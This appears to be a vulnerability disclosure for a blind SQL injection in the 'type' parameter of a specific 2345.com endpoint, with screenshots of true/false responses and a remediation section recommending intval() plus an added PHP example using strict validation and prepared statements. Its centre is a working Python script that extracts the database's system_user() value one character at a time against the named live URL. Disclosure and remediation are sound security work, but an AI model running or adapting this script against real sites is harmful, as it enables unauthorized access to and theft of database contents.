Injection point: https://so.2345.com/2345app/get_app_news.php?nt=0&type=660&id=

Injected parameter: type

Filtering is in place.

True
 

[Screenshot 2016-04-13 19.00.05.png]



False
 

[Screenshot 2016-04-13 19.00.14.png]

user [email protected]
 

[Screenshot 2016-04-13 19.00.56.png]


 

#!/usr/bin/env python
#-*- coding: utf-8 -*-
import time
import string
import binascii
import requests

res = ''
character = "%." + string.digits + "@" + string.ascii_uppercase + "_" + string.ascii_lowercase
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36',
    'Referer': '',
}
for i in range(1, 21):
    for p in character:
        # Retry the same request until it completes without an exception.
        while True:
            try:
                url = "https://so.2345.com/2345app/get_app_news.php?nt=0&type=660 and position({} in system_user())={}&id=".format('0x' + binascii.b2a_hex(p), i)
                req = requests.get(url, headers=headers)
                print req.url + ' --- ',
                print len(req.text)
                break
            except:
                pass
        # A response body longer than 100 characters is treated as the True case.
        if len(req.text) > 100:
            res += p
            print "\n[Result]: " + res + "\n"
            break
        time.sleep(0.5)
print "\n\n[Finish]: " + res

Solution:

Just use intval()!
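
The fix suggested above, as an added example (not the site's code and not from the original report): intval() neutralizes the payload by silently truncating it, while strict validation plus a bound parameter also lets the request be refused and logged. The table and column names (app_news, type, title), the helper names, and the sample values are assumptions constructed for illustration.

```php
<?php
// Added example, not the site's code. Table/column names are hypothetical.

// Return the parameter as an int, or null when it is not a plain integer.
// intval() would silently turn "660 and 1=1" into 660; this rejects the
// value instead, so the request can be refused and logged.
function strict_int_param(array $query, string $name): ?int
{
    // Array-valued parameters (type[]=...) are rejected as well.
    if (!isset($query[$name]) || !is_string($query[$name])) {
        return null;
    }
    $value = filter_var($query[$name], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]);
    return $value === false ? null : $value;
}

function fetch_news(PDO $db, array $query): array
{
    $type = strict_int_param($query, 'type');
    if ($type === null) {
        error_log('get_app_news: rejected non-integer type parameter');
        http_response_code(400);
        return [];
    }
    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT title FROM app_news WHERE type = :type');
    $stmt->bindValue(':type', $type, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE app_news (type INTEGER, title TEXT)');
$db->exec("INSERT INTO app_news VALUES (660, 'sample item')");

var_dump(intval('660 and 1=1'));                       // truncated silently
var_dump(fetch_news($db, ['type' => '660']));          // normal request
var_dump(fetch_news($db, ['type' => '660 and 1=1']));  // rejected and logged
```

The same check applies to the other numeric parameters of the endpoint (nt and id); rejected requests in the error log give a signal for detecting repeated probing of the parameter.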